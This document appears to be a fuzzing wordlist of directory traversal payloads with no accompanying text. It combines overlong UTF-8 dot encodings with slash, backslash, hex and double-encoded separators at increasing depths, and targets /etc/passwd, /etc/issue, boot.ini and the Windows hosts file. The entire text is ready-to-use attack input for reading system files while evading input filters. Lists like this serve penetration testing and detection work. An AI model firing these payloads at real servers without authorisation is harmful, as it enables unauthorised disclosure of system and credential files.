-%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/windows/system32/drivers/etc/hosts -%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/etc/passwd -%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/etc/issue -%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/boot.ini -%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/windows/system32/drivers/etc/hosts -%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/etc/passwd -%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/etc/issue -%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/boot.ini -%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/windows/system32/drivers/etc/hosts -%e0%80%ae%e0%80%ae\etc\passwd -%e0%80%ae%e0%80%ae\etc\issue -%e0%80%ae%e0%80%ae\boot.ini -%e0%80%ae%e0%80%ae\windows\system32\drivers\etc\hosts -%e0%80%ae%e0%80%ae\%e0%80%ae%e0%80%ae\etc\passwd -%e0%80%ae%e0%80%ae\%e0%80%ae%e0%80%ae\etc\issue -%e0%80%ae%e0%80%ae\%e0%80%ae%e0%80%ae\boot.ini -%e0%80%ae%e0%80%ae\%e0%80%ae%e0%80%ae\windows\system32\drivers\etc\hosts -%e0%80%ae%e0%80%ae\%e0%80%ae%e0%80%ae\%e0%80%ae%e0%80%ae\etc\passwd -%e0%80%ae%e0%80%ae\%e0%80%ae%e0%80%ae\%e0%80%ae%e0%80%ae\etc\issue -%e0%80%ae%e0%80%ae\%e0%80%ae%e0%80%ae\%e0%80%ae%e0%80%ae\boot.ini -%e0%80%ae%e0%80%ae\%e0%80%ae%e0%80%ae\%e0%80%ae%e0%80%ae\windows\system32\drivers\etc\hosts -%e0%80%ae%e0%80%ae\%e0%80%ae%e0%80%ae\%e0%80%ae%e0%80%ae\%e0%80%ae%e0%80%ae\etc\passwd -%e0%80%ae%e0%80%ae\%e0%80%ae%e0%80%ae\%e0%80%ae%e0%80%ae\%e0%80%ae%e0%80%ae\etc\issue -%e0%80%ae%e0%80%ae\%e0%80%ae%e0%80%ae\%e0%80%ae%e0%80%ae\%e0%80%ae%e0%80%ae\boot.ini -%e0%80%ae%e0%80%ae\%e0%80%ae%e0%80%ae\%e0%80%ae%e0%80%ae\%e0%80%ae%e0%80%ae\windows\system32\drivers\etc\hosts -%e0%80%ae%e0%80%ae\%e0%80%ae%e0%80%ae\%e0%80%ae%e0%80%ae\%e0%80%ae%e0%80%ae\%e0%80%ae%e0%80%ae\etc\passwd -%e0%80%ae%e0%80%ae\%e0%80%ae%e0%80%ae\%e0%80%ae%e0%80%ae\%e0%80%ae%e0%80%ae\%e0%80%ae%e0%80%ae\etc\issue -%e0%80%ae%e0%80%ae\%e0%80%ae%e0%80%ae\%e0%80%ae%e0%80%ae\%e0%80%ae%e0%80%ae\%e0%80%ae%e0%80%ae\boot.ini -%e0%80%ae%e0%80%ae\%e0%80%ae%e0%80%ae\%e0%80%ae%e0%80%ae\%e0%80%ae%e0%80%ae\%e0%80%ae%e0%80%ae\windows\system32\drivers\etc\hosts -%e0%80%ae%e0%80%ae\%e0%80%ae%e0%80%ae\%e0%80%ae%e0%80%ae\%e0%80%ae%e0%80%ae\%e0%80%ae%e0%80%ae\%e0%80%ae%e0%80%ae\etc\passwd -%e0%80%ae%e0%80%ae\%e0%80%ae%e0%80%ae\%e0%80%ae%e0%80%ae\%e0%80%ae%e0%80%ae\%e0%80%ae%e0%80%ae\%e0%80%ae%e0%80%ae\etc\issue -%e0%80%ae%e0%80%ae\%e0%80%ae%e0%80%ae\%e0%80%ae%e0%80%ae\%e0%80%ae%e0%80%ae\%e0%80%ae%e0%80%ae\%e0%80%ae%e0%80%ae\boot.ini -%e0%80%ae%e0%80%ae\%e0%80%ae%e0%80%ae\%e0%80%ae%e0%80%ae\%e0%80%ae%e0%80%ae\%e0%80%ae%e0%80%ae\%e0%80%ae%e0%80%ae\windows\system32\drivers\etc\hosts -%e0%80%ae%e0%80%ae%2fetc%2fpasswd -%e0%80%ae%e0%80%ae%2fetc%2fissue -%e0%80%ae%e0%80%ae%2fboot.ini -%e0%80%ae%e0%80%ae%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%e0%80%ae%e0%80%ae%2f%e0%80%ae%e0%80%ae%2fetc%2fpasswd -%e0%80%ae%e0%80%ae%2f%e0%80%ae%e0%80%ae%2fetc%2fissue -%e0%80%ae%e0%80%ae%2f%e0%80%ae%e0%80%ae%2fboot.ini -%e0%80%ae%e0%80%ae%2f%e0%80%ae%e0%80%ae%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%e0%80%ae%e0%80%ae%2f%e0%80%ae%e0%80%ae%2f%e0%80%ae%e0%80%ae%2fetc%2fpasswd -%e0%80%ae%e0%80%ae%2f%e0%80%ae%e0%80%ae%2f%e0%80%ae%e0%80%ae%2fetc%2fissue -%e0%80%ae%e0%80%ae%2f%e0%80%ae%e0%80%ae%2f%e0%80%ae%e0%80%ae%2fboot.ini -%e0%80%ae%e0%80%ae%2f%e0%80%ae%e0%80%ae%2f%e0%80%ae%e0%80%ae%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%e0%80%ae%e0%80%ae%2f%e0%80%ae%e0%80%ae%2f%e0%80%ae%e0%80%ae%2f%e0%80%ae%e0%80%ae%2fetc%2fpasswd -%e0%80%ae%e0%80%ae%2f%e0%80%ae%e0%80%ae%2f%e0%80%ae%e0%80%ae%2f%e0%80%ae%e0%80%ae%2fetc%2fissue -%e0%80%ae%e0%80%ae%2f%e0%80%ae%e0%80%ae%2f%e0%80%ae%e0%80%ae%2f%e0%80%ae%e0%80%ae%2fboot.ini -%e0%80%ae%e0%80%ae%2f%e0%80%ae%e0%80%ae%2f%e0%80%ae%e0%80%ae%2f%e0%80%ae%e0%80%ae%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%e0%80%ae%e0%80%ae%2f%e0%80%ae%e0%80%ae%2f%e0%80%ae%e0%80%ae%2f%e0%80%ae%e0%80%ae%2f%e0%80%ae%e0%80%ae%2fetc%2fpasswd -%e0%80%ae%e0%80%ae%2f%e0%80%ae%e0%80%ae%2f%e0%80%ae%e0%80%ae%2f%e0%80%ae%e0%80%ae%2f%e0%80%ae%e0%80%ae%2fetc%2fissue -%e0%80%ae%e0%80%ae%2f%e0%80%ae%e0%80%ae%2f%e0%80%ae%e0%80%ae%2f%e0%80%ae%e0%80%ae%2f%e0%80%ae%e0%80%ae%2fboot.ini -%e0%80%ae%e0%80%ae%2f%e0%80%ae%e0%80%ae%2f%e0%80%ae%e0%80%ae%2f%e0%80%ae%e0%80%ae%2f%e0%80%ae%e0%80%ae%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%e0%80%ae%e0%80%ae%2f%e0%80%ae%e0%80%ae%2f%e0%80%ae%e0%80%ae%2f%e0%80%ae%e0%80%ae%2f%e0%80%ae%e0%80%ae%2f%e0%80%ae%e0%80%ae%2fetc%2fpasswd -%e0%80%ae%e0%80%ae%2f%e0%80%ae%e0%80%ae%2f%e0%80%ae%e0%80%ae%2f%e0%80%ae%e0%80%ae%2f%e0%80%ae%e0%80%ae%2f%e0%80%ae%e0%80%ae%2fetc%2fissue -%e0%80%ae%e0%80%ae%2f%e0%80%ae%e0%80%ae%2f%e0%80%ae%e0%80%ae%2f%e0%80%ae%e0%80%ae%2f%e0%80%ae%e0%80%ae%2f%e0%80%ae%e0%80%ae%2fboot.ini -%e0%80%ae%e0%80%ae%2f%e0%80%ae%e0%80%ae%2f%e0%80%ae%e0%80%ae%2f%e0%80%ae%e0%80%ae%2f%e0%80%ae%e0%80%ae%2f%e0%80%ae%e0%80%ae%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%e0%80%ae%e0%80%ae%5cetc%5cpasswd -%e0%80%ae%e0%80%ae%5cetc%5cissue -%e0%80%ae%e0%80%ae%5cboot.ini -%e0%80%ae%e0%80%ae%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%e0%80%ae%e0%80%ae%5c%e0%80%ae%e0%80%ae%5cetc%5cpasswd -%e0%80%ae%e0%80%ae%5c%e0%80%ae%e0%80%ae%5cetc%5cissue -%e0%80%ae%e0%80%ae%5c%e0%80%ae%e0%80%ae%5cboot.ini -%e0%80%ae%e0%80%ae%5c%e0%80%ae%e0%80%ae%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%e0%80%ae%e0%80%ae%5c%e0%80%ae%e0%80%ae%5c%e0%80%ae%e0%80%ae%5cetc%5cpasswd -%e0%80%ae%e0%80%ae%5c%e0%80%ae%e0%80%ae%5c%e0%80%ae%e0%80%ae%5cetc%5cissue -%e0%80%ae%e0%80%ae%5c%e0%80%ae%e0%80%ae%5c%e0%80%ae%e0%80%ae%5cboot.ini -%e0%80%ae%e0%80%ae%5c%e0%80%ae%e0%80%ae%5c%e0%80%ae%e0%80%ae%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%e0%80%ae%e0%80%ae%5c%e0%80%ae%e0%80%ae%5c%e0%80%ae%e0%80%ae%5c%e0%80%ae%e0%80%ae%5cetc%5cpasswd -%e0%80%ae%e0%80%ae%5c%e0%80%ae%e0%80%ae%5c%e0%80%ae%e0%80%ae%5c%e0%80%ae%e0%80%ae%5cetc%5cissue -%e0%80%ae%e0%80%ae%5c%e0%80%ae%e0%80%ae%5c%e0%80%ae%e0%80%ae%5c%e0%80%ae%e0%80%ae%5cboot.ini -%e0%80%ae%e0%80%ae%5c%e0%80%ae%e0%80%ae%5c%e0%80%ae%e0%80%ae%5c%e0%80%ae%e0%80%ae%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%e0%80%ae%e0%80%ae%5c%e0%80%ae%e0%80%ae%5c%e0%80%ae%e0%80%ae%5c%e0%80%ae%e0%80%ae%5c%e0%80%ae%e0%80%ae%5cetc%5cpasswd -%e0%80%ae%e0%80%ae%5c%e0%80%ae%e0%80%ae%5c%e0%80%ae%e0%80%ae%5c%e0%80%ae%e0%80%ae%5c%e0%80%ae%e0%80%ae%5cetc%5cissue -%e0%80%ae%e0%80%ae%5c%e0%80%ae%e0%80%ae%5c%e0%80%ae%e0%80%ae%5c%e0%80%ae%e0%80%ae%5c%e0%80%ae%e0%80%ae%5cboot.ini -%e0%80%ae%e0%80%ae%5c%e0%80%ae%e0%80%ae%5c%e0%80%ae%e0%80%ae%5c%e0%80%ae%e0%80%ae%5c%e0%80%ae%e0%80%ae%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%e0%80%ae%e0%80%ae%5c%e0%80%ae%e0%80%ae%5c%e0%80%ae%e0%80%ae%5c%e0%80%ae%e0%80%ae%5c%e0%80%ae%e0%80%ae%5c%e0%80%ae%e0%80%ae%5cetc%5cpasswd -%e0%80%ae%e0%80%ae%5c%e0%80%ae%e0%80%ae%5c%e0%80%ae%e0%80%ae%5c%e0%80%ae%e0%80%ae%5c%e0%80%ae%e0%80%ae%5c%e0%80%ae%e0%80%ae%5cetc%5cissue -%e0%80%ae%e0%80%ae%5c%e0%80%ae%e0%80%ae%5c%e0%80%ae%e0%80%ae%5c%e0%80%ae%e0%80%ae%5c%e0%80%ae%e0%80%ae%5c%e0%80%ae%e0%80%ae%5cboot.ini -%e0%80%ae%e0%80%ae%5c%e0%80%ae%e0%80%ae%5c%e0%80%ae%e0%80%ae%5c%e0%80%ae%e0%80%ae%5c%e0%80%ae%e0%80%ae%5c%e0%80%ae%e0%80%ae%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%e0%80%ae%e0%80%ae0x2fetc0x2fpasswd -%e0%80%ae%e0%80%ae0x2fetc0x2fissue -%e0%80%ae%e0%80%ae0x2fboot.ini -%e0%80%ae%e0%80%ae0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%e0%80%ae%e0%80%ae0x2f%e0%80%ae%e0%80%ae0x2fetc0x2fpasswd -%e0%80%ae%e0%80%ae0x2f%e0%80%ae%e0%80%ae0x2fetc0x2fissue -%e0%80%ae%e0%80%ae0x2f%e0%80%ae%e0%80%ae0x2fboot.ini -%e0%80%ae%e0%80%ae0x2f%e0%80%ae%e0%80%ae0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%e0%80%ae%e0%80%ae0x2f%e0%80%ae%e0%80%ae0x2f%e0%80%ae%e0%80%ae0x2fetc0x2fpasswd -%e0%80%ae%e0%80%ae0x2f%e0%80%ae%e0%80%ae0x2f%e0%80%ae%e0%80%ae0x2fetc0x2fissue -%e0%80%ae%e0%80%ae0x2f%e0%80%ae%e0%80%ae0x2f%e0%80%ae%e0%80%ae0x2fboot.ini -%e0%80%ae%e0%80%ae0x2f%e0%80%ae%e0%80%ae0x2f%e0%80%ae%e0%80%ae0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%e0%80%ae%e0%80%ae0x2f%e0%80%ae%e0%80%ae0x2f%e0%80%ae%e0%80%ae0x2f%e0%80%ae%e0%80%ae0x2fetc0x2fpasswd -%e0%80%ae%e0%80%ae0x2f%e0%80%ae%e0%80%ae0x2f%e0%80%ae%e0%80%ae0x2f%e0%80%ae%e0%80%ae0x2fetc0x2fissue -%e0%80%ae%e0%80%ae0x2f%e0%80%ae%e0%80%ae0x2f%e0%80%ae%e0%80%ae0x2f%e0%80%ae%e0%80%ae0x2fboot.ini -%e0%80%ae%e0%80%ae0x2f%e0%80%ae%e0%80%ae0x2f%e0%80%ae%e0%80%ae0x2f%e0%80%ae%e0%80%ae0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%e0%80%ae%e0%80%ae0x2f%e0%80%ae%e0%80%ae0x2f%e0%80%ae%e0%80%ae0x2f%e0%80%ae%e0%80%ae0x2f%e0%80%ae%e0%80%ae0x2fetc0x2fpasswd -%e0%80%ae%e0%80%ae0x2f%e0%80%ae%e0%80%ae0x2f%e0%80%ae%e0%80%ae0x2f%e0%80%ae%e0%80%ae0x2f%e0%80%ae%e0%80%ae0x2fetc0x2fissue -%e0%80%ae%e0%80%ae0x2f%e0%80%ae%e0%80%ae0x2f%e0%80%ae%e0%80%ae0x2f%e0%80%ae%e0%80%ae0x2f%e0%80%ae%e0%80%ae0x2fboot.ini -%e0%80%ae%e0%80%ae0x2f%e0%80%ae%e0%80%ae0x2f%e0%80%ae%e0%80%ae0x2f%e0%80%ae%e0%80%ae0x2f%e0%80%ae%e0%80%ae0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%e0%80%ae%e0%80%ae0x2f%e0%80%ae%e0%80%ae0x2f%e0%80%ae%e0%80%ae0x2f%e0%80%ae%e0%80%ae0x2f%e0%80%ae%e0%80%ae0x2f%e0%80%ae%e0%80%ae0x2fetc0x2fpasswd -%e0%80%ae%e0%80%ae0x2f%e0%80%ae%e0%80%ae0x2f%e0%80%ae%e0%80%ae0x2f%e0%80%ae%e0%80%ae0x2f%e0%80%ae%e0%80%ae0x2f%e0%80%ae%e0%80%ae0x2fetc0x2fissue -%e0%80%ae%e0%80%ae0x2f%e0%80%ae%e0%80%ae0x2f%e0%80%ae%e0%80%ae0x2f%e0%80%ae%e0%80%ae0x2f%e0%80%ae%e0%80%ae0x2f%e0%80%ae%e0%80%ae0x2fboot.ini -%e0%80%ae%e0%80%ae0x2f%e0%80%ae%e0%80%ae0x2f%e0%80%ae%e0%80%ae0x2f%e0%80%ae%e0%80%ae0x2f%e0%80%ae%e0%80%ae0x2f%e0%80%ae%e0%80%ae0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%e0%80%ae%e0%80%ae0x5cetc0x5cpasswd -%e0%80%ae%e0%80%ae0x5cetc0x5cissue -%e0%80%ae%e0%80%ae0x5cboot.ini -%e0%80%ae%e0%80%ae0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%e0%80%ae%e0%80%ae0x5c%e0%80%ae%e0%80%ae0x5cetc0x5cpasswd -%e0%80%ae%e0%80%ae0x5c%e0%80%ae%e0%80%ae0x5cetc0x5cissue -%e0%80%ae%e0%80%ae0x5c%e0%80%ae%e0%80%ae0x5cboot.ini -%e0%80%ae%e0%80%ae0x5c%e0%80%ae%e0%80%ae0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%e0%80%ae%e0%80%ae0x5c%e0%80%ae%e0%80%ae0x5c%e0%80%ae%e0%80%ae0x5cetc0x5cpasswd -%e0%80%ae%e0%80%ae0x5c%e0%80%ae%e0%80%ae0x5c%e0%80%ae%e0%80%ae0x5cetc0x5cissue -%e0%80%ae%e0%80%ae0x5c%e0%80%ae%e0%80%ae0x5c%e0%80%ae%e0%80%ae0x5cboot.ini -%e0%80%ae%e0%80%ae0x5c%e0%80%ae%e0%80%ae0x5c%e0%80%ae%e0%80%ae0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%e0%80%ae%e0%80%ae0x5c%e0%80%ae%e0%80%ae0x5c%e0%80%ae%e0%80%ae0x5c%e0%80%ae%e0%80%ae0x5cetc0x5cpasswd -%e0%80%ae%e0%80%ae0x5c%e0%80%ae%e0%80%ae0x5c%e0%80%ae%e0%80%ae0x5c%e0%80%ae%e0%80%ae0x5cetc0x5cissue -%e0%80%ae%e0%80%ae0x5c%e0%80%ae%e0%80%ae0x5c%e0%80%ae%e0%80%ae0x5c%e0%80%ae%e0%80%ae0x5cboot.ini -%e0%80%ae%e0%80%ae0x5c%e0%80%ae%e0%80%ae0x5c%e0%80%ae%e0%80%ae0x5c%e0%80%ae%e0%80%ae0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%e0%80%ae%e0%80%ae0x5c%e0%80%ae%e0%80%ae0x5c%e0%80%ae%e0%80%ae0x5c%e0%80%ae%e0%80%ae0x5c%e0%80%ae%e0%80%ae0x5cetc0x5cpasswd -%e0%80%ae%e0%80%ae0x5c%e0%80%ae%e0%80%ae0x5c%e0%80%ae%e0%80%ae0x5c%e0%80%ae%e0%80%ae0x5c%e0%80%ae%e0%80%ae0x5cetc0x5cissue -%e0%80%ae%e0%80%ae0x5c%e0%80%ae%e0%80%ae0x5c%e0%80%ae%e0%80%ae0x5c%e0%80%ae%e0%80%ae0x5c%e0%80%ae%e0%80%ae0x5cboot.ini -%e0%80%ae%e0%80%ae0x5c%e0%80%ae%e0%80%ae0x5c%e0%80%ae%e0%80%ae0x5c%e0%80%ae%e0%80%ae0x5c%e0%80%ae%e0%80%ae0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%e0%80%ae%e0%80%ae0x5c%e0%80%ae%e0%80%ae0x5c%e0%80%ae%e0%80%ae0x5c%e0%80%ae%e0%80%ae0x5c%e0%80%ae%e0%80%ae0x5c%e0%80%ae%e0%80%ae0x5cetc0x5cpasswd -%e0%80%ae%e0%80%ae0x5c%e0%80%ae%e0%80%ae0x5c%e0%80%ae%e0%80%ae0x5c%e0%80%ae%e0%80%ae0x5c%e0%80%ae%e0%80%ae0x5c%e0%80%ae%e0%80%ae0x5cetc0x5cissue -%e0%80%ae%e0%80%ae0x5c%e0%80%ae%e0%80%ae0x5c%e0%80%ae%e0%80%ae0x5c%e0%80%ae%e0%80%ae0x5c%e0%80%ae%e0%80%ae0x5c%e0%80%ae%e0%80%ae0x5cboot.ini -%e0%80%ae%e0%80%ae0x5c%e0%80%ae%e0%80%ae0x5c%e0%80%ae%e0%80%ae0x5c%e0%80%ae%e0%80%ae0x5c%e0%80%ae%e0%80%ae0x5c%e0%80%ae%e0%80%ae0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%e0%80%ae%e0%80%ae%252fetc%252fpasswd -%e0%80%ae%e0%80%ae%252fetc%252fissue -%e0%80%ae%e0%80%ae%252fboot.ini -%e0%80%ae%e0%80%ae%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%e0%80%ae%e0%80%ae%252f%e0%80%ae%e0%80%ae%252fetc%252fpasswd -%e0%80%ae%e0%80%ae%252f%e0%80%ae%e0%80%ae%252fetc%252fissue -%e0%80%ae%e0%80%ae%252f%e0%80%ae%e0%80%ae%252fboot.ini -%e0%80%ae%e0%80%ae%252f%e0%80%ae%e0%80%ae%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%e0%80%ae%e0%80%ae%252f%e0%80%ae%e0%80%ae%252f%e0%80%ae%e0%80%ae%252fetc%252fpasswd -%e0%80%ae%e0%80%ae%252f%e0%80%ae%e0%80%ae%252f%e0%80%ae%e0%80%ae%252fetc%252fissue -%e0%80%ae%e0%80%ae%252f%e0%80%ae%e0%80%ae%252f%e0%80%ae%e0%80%ae%252fboot.ini -%e0%80%ae%e0%80%ae%252f%e0%80%ae%e0%80%ae%252f%e0%80%ae%e0%80%ae%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%e0%80%ae%e0%80%ae%252f%e0%80%ae%e0%80%ae%252f%e0%80%ae%e0%80%ae%252f%e0%80%ae%e0%80%ae%252fetc%252fpasswd -%e0%80%ae%e0%80%ae%252f%e0%80%ae%e0%80%ae%252f%e0%80%ae%e0%80%ae%252f%e0%80%ae%e0%80%ae%252fetc%252fissue -%e0%80%ae%e0%80%ae%252f%e0%80%ae%e0%80%ae%252f%e0%80%ae%e0%80%ae%252f%e0%80%ae%e0%80%ae%252fboot.ini -%e0%80%ae%e0%80%ae%252f%e0%80%ae%e0%80%ae%252f%e0%80%ae%e0%80%ae%252f%e0%80%ae%e0%80%ae%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%e0%80%ae%e0%80%ae%252f%e0%80%ae%e0%80%ae%252f%e0%80%ae%e0%80%ae%252f%e0%80%ae%e0%80%ae%252f%e0%80%ae%e0%80%ae%252fetc%252fpasswd -%e0%80%ae%e0%80%ae%252f%e0%80%ae%e0%80%ae%252f%e0%80%ae%e0%80%ae%252f%e0%80%ae%e0%80%ae%252f%e0%80%ae%e0%80%ae%252fetc%252fissue -%e0%80%ae%e0%80%ae%252f%e0%80%ae%e0%80%ae%252f%e0%80%ae%e0%80%ae%252f%e0%80%ae%e0%80%ae%252f%e0%80%ae%e0%80%ae%252fboot.ini -%e0%80%ae%e0%80%ae%252f%e0%80%ae%e0%80%ae%252f%e0%80%ae%e0%80%ae%252f%e0%80%ae%e0%80%ae%252f%e0%80%ae%e0%80%ae%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%e0%80%ae%e0%80%ae%252f%e0%80%ae%e0%80%ae%252f%e0%80%ae%e0%80%ae%252f%e0%80%ae%e0%80%ae%252f%e0%80%ae%e0%80%ae%252f%e0%80%ae%e0%80%ae%252fetc%252fpasswd -%e0%80%ae%e0%80%ae%252f%e0%80%ae%e0%80%ae%252f%e0%80%ae%e0%80%ae%252f%e0%80%ae%e0%80%ae%252f%e0%80%ae%e0%80%ae%252f%e0%80%ae%e0%80%ae%252fetc%252fissue -%e0%80%ae%e0%80%ae%252f%e0%80%ae%e0%80%ae%252f%e0%80%ae%e0%80%ae%252f%e0%80%ae%e0%80%ae%252f%e0%80%ae%e0%80%ae%252f%e0%80%ae%e0%80%ae%252fboot.ini -%e0%80%ae%e0%80%ae%252f%e0%80%ae%e0%80%ae%252f%e0%80%ae%e0%80%ae%252f%e0%80%ae%e0%80%ae%252f%e0%80%ae%e0%80%ae%252f%e0%80%ae%e0%80%ae%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%e0%80%ae%e0%80%ae%255cetc%255cpasswd -%e0%80%ae%e0%80%ae%255cetc%255cissue -%e0%80%ae%e0%80%ae%255cboot.ini -%e0%80%ae%e0%80%ae%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%e0%80%ae%e0%80%ae%255c%e0%80%ae%e0%80%ae%255cetc%255cpasswd -%e0%80%ae%e0%80%ae%255c%e0%80%ae%e0%80%ae%255cetc%255cissue -%e0%80%ae%e0%80%ae%255c%e0%80%ae%e0%80%ae%255cboot.ini -%e0%80%ae%e0%80%ae%255c%e0%80%ae%e0%80%ae%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%e0%80%ae%e0%80%ae%255c%e0%80%ae%e0%80%ae%255c%e0%80%ae%e0%80%ae%255cetc%255cpasswd -%e0%80%ae%e0%80%ae%255c%e0%80%ae%e0%80%ae%255c%e0%80%ae%e0%80%ae%255cetc%255cissue -%e0%80%ae%e0%80%ae%255c%e0%80%ae%e0%80%ae%255c%e0%80%ae%e0%80%ae%255cboot.ini -%e0%80%ae%e0%80%ae%255c%e0%80%ae%e0%80%ae%255c%e0%80%ae%e0%80%ae%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%e0%80%ae%e0%80%ae%255c%e0%80%ae%e0%80%ae%255c%e0%80%ae%e0%80%ae%255c%e0%80%ae%e0%80%ae%255cetc%255cpasswd -%e0%80%ae%e0%80%ae%255c%e0%80%ae%e0%80%ae%255c%e0%80%ae%e0%80%ae%255c%e0%80%ae%e0%80%ae%255cetc%255cissue -%e0%80%ae%e0%80%ae%255c%e0%80%ae%e0%80%ae%255c%e0%80%ae%e0%80%ae%255c%e0%80%ae%e0%80%ae%255cboot.ini -%e0%80%ae%e0%80%ae%255c%e0%80%ae%e0%80%ae%255c%e0%80%ae%e0%80%ae%255c%e0%80%ae%e0%80%ae%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%e0%80%ae%e0%80%ae%255c%e0%80%ae%e0%80%ae%255c%e0%80%ae%e0%80%ae%255c%e0%80%ae%e0%80%ae%255c%e0%80%ae%e0%80%ae%255cetc%255cpasswd -%e0%80%ae%e0%80%ae%255c%e0%80%ae%e0%80%ae%255c%e0%80%ae%e0%80%ae%255c%e0%80%ae%e0%80%ae%255c%e0%80%ae%e0%80%ae%255cetc%255cissue -%e0%80%ae%e0%80%ae%255c%e0%80%ae%e0%80%ae%255c%e0%80%ae%e0%80%ae%255c%e0%80%ae%e0%80%ae%255c%e0%80%ae%e0%80%ae%255cboot.ini -%e0%80%ae%e0%80%ae%255c%e0%80%ae%e0%80%ae%255c%e0%80%ae%e0%80%ae%255c%e0%80%ae%e0%80%ae%255c%e0%80%ae%e0%80%ae%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%e0%80%ae%e0%80%ae%255c%e0%80%ae%e0%80%ae%255c%e0%80%ae%e0%80%ae%255c%e0%80%ae%e0%80%ae%255c%e0%80%ae%e0%80%ae%255c%e0%80%ae%e0%80%ae%255cetc%255cpasswd -%e0%80%ae%e0%80%ae%255c%e0%80%ae%e0%80%ae%255c%e0%80%ae%e0%80%ae%255c%e0%80%ae%e0%80%ae%255c%e0%80%ae%e0%80%ae%255c%e0%80%ae%e0%80%ae%255cetc%255cissue -%e0%80%ae%e0%80%ae%255c%e0%80%ae%e0%80%ae%255c%e0%80%ae%e0%80%ae%255c%e0%80%ae%e0%80%ae%255c%e0%80%ae%e0%80%ae%255c%e0%80%ae%e0%80%ae%255cboot.ini -%e0%80%ae%e0%80%ae%255c%e0%80%ae%e0%80%ae%255c%e0%80%ae%e0%80%ae%255c%e0%80%ae%e0%80%ae%255c%e0%80%ae%e0%80%ae%255c%e0%80%ae%e0%80%ae%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%e0%80%ae%e0%80%ae%c0%2fetc%c0%2fpasswd -%e0%80%ae%e0%80%ae%c0%2fetc%c0%2fissue -%e0%80%ae%e0%80%ae%c0%2fboot.ini -%e0%80%ae%e0%80%ae%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%e0%80%ae%e0%80%ae%c0%2f%e0%80%ae%e0%80%ae%c0%2fetc%c0%2fpasswd -%e0%80%ae%e0%80%ae%c0%2f%e0%80%ae%e0%80%ae%c0%2fetc%c0%2fissue -%e0%80%ae%e0%80%ae%c0%2f%e0%80%ae%e0%80%ae%c0%2fboot.ini -%e0%80%ae%e0%80%ae%c0%2f%e0%80%ae%e0%80%ae%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%e0%80%ae%e0%80%ae%c0%2f%e0%80%ae%e0%80%ae%c0%2f%e0%80%ae%e0%80%ae%c0%2fetc%c0%2fpasswd -%e0%80%ae%e0%80%ae%c0%2f%e0%80%ae%e0%80%ae%c0%2f%e0%80%ae%e0%80%ae%c0%2fetc%c0%2fissue -%e0%80%ae%e0%80%ae%c0%2f%e0%80%ae%e0%80%ae%c0%2f%e0%80%ae%e0%80%ae%c0%2fboot.ini -%e0%80%ae%e0%80%ae%c0%2f%e0%80%ae%e0%80%ae%c0%2f%e0%80%ae%e0%80%ae%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts 